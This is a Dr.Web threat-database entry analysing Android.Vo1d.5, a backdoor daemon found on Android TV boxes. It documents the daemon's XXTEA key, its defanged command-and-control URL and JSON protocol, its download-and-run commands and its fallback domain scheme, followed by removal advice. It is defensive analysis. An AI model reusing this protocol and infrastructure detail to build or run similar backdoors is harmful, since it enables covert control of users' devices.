マイライブラリ
マイライブラリ

+ マイライブラリに追加

電話

お問い合わせ履歴

電話(英語)

+7 (495) 789-45-86

Profile

Android.Vo1d.5

Added to the Dr.Web virus database: 2024-07-26

Virus description added:

SHA1 hashes:

  • ed975255eba30345de74936e24b9b3090f26ed7e (/data/google/daemon)
  • 182939085a9aa1d6f0e60da31b200cd644522748 (a decrypted payload)

Description

This is a component of the malicious backdoor Android.Vo1d, which was detected in the system storage area of a number of Android-based TV box models. It is a daemon that performs various tasks on infected devices. Its functionality includes:

  • Decrypting the payload;
  • Communicating with the C&C server;
  • Downloading APK files (presumably);
  • Downloading and running native libraries.

Operating routine

Decrypting the payload

Android.Vo1d.5 extracts and decrypts a payload from itself, using the XXTEA algorithm with the key fPNH830ES23QOPIM*&S955(2WR@L*&GF. The decrypted object—the main Android.Vo1d.5 body—is loaded into the RAM.

Communicating with the C&C server

Via a POST request, Android.Vo1d.5 contacts the C&C server whose address is taken from a preassigned list. By default, the list has only a single address hxxp[:]//meiboot[.]com/api/config.

The request format is as follows:

POST hxxp[:]//meiboot[.]com/api/config
User-Agent curl/7.64.0
Accept */*
Content-Type application/json;charset=UTF-8

An example of a request:


{
    "a": "32",
    "m": "debuggerd-11236.0",
    "s": "10",
    "u": "a1d4f55f6be3d743497fadee1d574b3357029c25"
}

where:

  • a — is a constant;
  • m — is a field that contains a string with information about the trojan’s process name as well as its pid and uid in <process_name>-<pid>.<uid> format;
  • s — is a constant;
  • u — is a session key that will encrypt the u and d fields (the latter is an URL) in responses from the server (these responses are described below).

The server responds with a JSON in one of several formats.

An example of response #1:


{
    "code": "200",
    "msg": [
        {
            "i": "",
            "v": "",
            "a": "",
            "u": ""
        },
        { ... }
    ]
}

where:

  • i — is the identifier of the loaded file;
  • v — is the identifier of the loaded file’s version;
  • a — is the request code;
  • u — is a link (encrypted with XXTEA) for downloading the file.

This response contains the list of commands that the trojan needs to execute.

Possible commands that can be issued by the C&C server:

  • 1 — download a file from the URL specified in the field u and put it in /data/system/users/.v/<id1>.<id2>;
  • 2 — re-download the file specified in the id i;
  • 3 — delete the file specified in the id i;
  • 4 — download the file from the specified URL and put it in the table, using the id i;
  • 5 — place the file in the table, using the id i.

The table above is a list of downloaded files, which the daemon goes through in another thread. Then it decrypts the downloaded files and puts the decrypted variants into one of the following directories:

  • /data/system/android.hardware.support@<id>.0.so (for Android API below version 29);
  • <prefix>/lib/arm/libsupport@<id>.0.so

Next, Android.Vo1d.5 launches these files by calling the function init in the .SO files.

An example of response #2:

{
    "code": "200",
    "msg": {
        "i": "",
        "d": [
            "url_1",
            "url_2",
            "...",
            "url_n"
        ]
    }
}

where:

  • i — the interval between server requests;
  • d — the list of C&C server addresses. Each string in this list is encrypted with the XXTEA algorithm, using the session key from the request.

This command is used to add more C&C server addresses for the daemon to communicate with.

Replenishing the C&C server address list locally

If Android.Vo1d.5 is unable to connect to any of the servers listed in the address table, the trojan generates several addresses on its own using the following scheme:

Server address Domain
0a597f79d876441d . com
57fd438a26874780 xyz
1e93c45d9b414092 top
111a2e0d676a4e94 net

Android.Vo1d.5 uses a random server address, adds a random domain to it, and then tries to connect to the address it generated. The trojan’s authors likely planned to register such addresses so that the daemons could continue operating if any C&C server addresses got blocked.

Artifacts

The Android.Vo1d.5 daemon contains the following strings:

  • C:/Users/dazhi/Desktop/dynamicbox/libsdk/external/libserver/server.c
  • C:/Users/dazhi/Desktop/dynamicbox/libsdk/external/libserver/record_stream.c

Indicators of compromise

News article about the trojan

Curing recommendations


Android

  1. If the mobile device is operating normally, download and install Dr.Web for Android Light. Run a full system scan and follow recommendations to neutralize the detected threats.
  2. If the mobile device has been locked by Android.Locker ransomware (the message on the screen tells you that you have broken some law or demands a set ransom amount; or you will see some other announcement that prevents you from using the handheld normally), do the following:
    • Load your smartphone or tablet in the safe mode (depending on the operating system version and specifications of the particular mobile device involved, this procedure can be performed in various ways; seek clarification from the user guide that was shipped with the device, or contact its manufacturer);
    • Once you have activated safe mode, install the Dr.Web для Android Light onto the infected handheld and run a full scan of the system; follow the steps recommended for neutralizing the threats that have been detected;
    • Switch off your device and turn it on as normal.

Find out more about Dr.Web for Android